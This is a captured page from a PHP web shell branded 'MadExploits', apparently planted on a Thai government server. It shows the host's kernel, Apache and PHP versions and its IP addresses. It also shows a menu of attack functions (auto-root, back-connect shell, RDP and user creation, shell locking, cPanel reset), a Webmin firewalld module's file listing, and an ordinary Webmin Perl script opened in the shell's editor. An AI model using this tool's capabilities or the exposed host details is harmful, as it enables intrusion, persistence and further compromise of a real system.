Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
firewalld /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
201
B
-rw-r--r--
bootup.cgi
403
B
-rwxr-xr-x
config
46
B
-rw-r--r--
config.info
88
B
-rw-r--r--
config.info.ca
102
B
-rw-r--r--
config.info.ca.UTF-8
103
B
-rw-r--r--
config.info.de
100
B
-rw-r--r--
config.info.de.UTF-8
100
B
-rw-r--r--
config.info.no
96
B
-rw-r--r--
config.info.no.UTF-8
96
B
-rw-r--r--
config.info.pl
95
B
-rw-r--r--
config.info.pl.UTF-8
98
B
-rw-r--r--
create_zone.cgi
2.04
KB
-rwxr-xr-x
default_zone.cgi
507
B
-rwxr-xr-x
delete_rules.cgi
862
B
-rwxr-xr-x
delete_zone.cgi
999
B
-rwxr-xr-x
edit_forward.cgi
2.5
KB
-rwxr-xr-x
edit_port.cgi
1.73
KB
-rwxr-xr-x
edit_serv.cgi
1.17
KB
-rwxr-xr-x
firewalld-lib.pl
8.53
KB
-rw-r--r--
index.cgi
5.01
KB
-rwxr-xr-x
install_check.pl
416
B
-rwxr-xr-x
log_parser.pl
741
B
-rwxr-xr-x
module.info
176
B
-rw-r--r--
module.info.ca
117
B
-rw-r--r--
module.info.ca.UTF-8
129
B
-rw-r--r--
module.info.de
124
B
-rw-r--r--
module.info.de.UTF-8
136
B
-rw-r--r--
module.info.pl
128
B
-rw-r--r--
module.info.pl.UTF-8
144
B
-rw-r--r--
open-ports.pl
2.32
KB
-rwxr-xr-x
restart.cgi
293
B
-rwxr-xr-x
save_forward.cgi
1.5
KB
-rwxr-xr-x
save_ifaces.cgi
546
B
-rwxr-xr-x
save_port.cgi
1.08
KB
-rwxr-xr-x
save_serv.cgi
1004
B
-rwxr-xr-x
start.cgi
273
B
-rwxr-xr-x
stop.cgi
271
B
-rwxr-xr-x
zone_form.cgi
915
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_forward.cgi
#!/usr/bin/perl # Show a form to edit one port forward use strict; use warnings; require './firewalld-lib.pl'; our (%in, %text); &ReadParse(); # Get the zone and rule my @zones = &list_firewalld_zones(); my ($zone) = grep { $_->{'name'} eq $in{'zone'} } @zones; $zone || &error($text{'port_ezone'}); my ($mode, $ports, $proto, $port, $portlow, $porthigh, $dstmode, $dstports, $dstport, $dstportlow, $dstporthigh, $dstaddr); if (!$in{'new'}) { &ui_print_header(undef, $text{'forward_edit'}, ""); ($ports, $proto, $dstports, $dstaddr) = split(/\//, $in{'id'}); if ($ports =~ /^(\d+)\-(\d+)$/) { $mode = 1; ($portlow, $porthigh) = ($1, $2); } else { $mode = 0; $port = $ports; } if ($dstports =~ /^(\d+)\-(\d+)$/) { $dstmode = 1; ($dstportlow, $dstporthigh) = ($1, $2); } else { $dstmode = 0; $dstport = $dstports; } } else { &ui_print_header(undef, $text{'forward_create'}, ""); $mode = 0; $dstmode = 0; $proto = "tcp"; } print &ui_form_start("save_forward.cgi", "post"); print &ui_hidden("zone", $in{'zone'}); print &ui_hidden("id", $in{'id'}); print &ui_hidden("new", $in{'new'}); print &ui_table_start($text{'forward_header'}, undef, 2); # Zone name print &ui_table_row($text{'forward_zone'}, "<tt>".&html_escape($zone->{'name'})."</tt>"); # Port number or range print &ui_table_row($text{'forward_port'}, &ui_radio_table("mode", $mode, [ [ 0, $text{'port_mode0'}, &ui_textbox("port", $port, 6) ], [ 1, $text{'port_mode1'}, &ui_textbox("portlow", $portlow, 6)." - ". &ui_textbox("porthigh", $porthigh, 6) ] ])); # Protocol name print &ui_table_row($text{'port_proto'}, &ui_select("proto", $proto, [ [ "tcp", "TCP" ], [ "udp", "UDP" ] ], 1, 0, 1)); # Destination port number or range print &ui_table_row($text{'forward_dstport'}, &ui_radio_table("dstmode", $dstmode, [ [ 0, $text{'port_mode0'}, &ui_textbox("dstport", $dstport, 6) ], [ 1, $text{'port_mode1'}, &ui_textbox("dstportlow", $dstportlow, 6)." - ". &ui_textbox("dstporthigh", $dstporthigh, 6) ], [ 2, $text{'port_mode2'} ] ])); # Destination address print &ui_table_row($text{'forward_dstaddr'}, &ui_opt_textbox("dstaddr", $dstaddr, 40, $text{'forward_dstlocal'})); print &ui_table_end(); if ($in{'new'}) { print &ui_form_end([ [ undef, $text{'create'} ] ]); } else { print &ui_form_end([ [ undef, $text{'save'} ], [ 'delete', $text{'delete'} ] ]); } &ui_print_footer("index.cgi?zone=".&urlize($zone->{'name'}), $text{'index_return'});
Close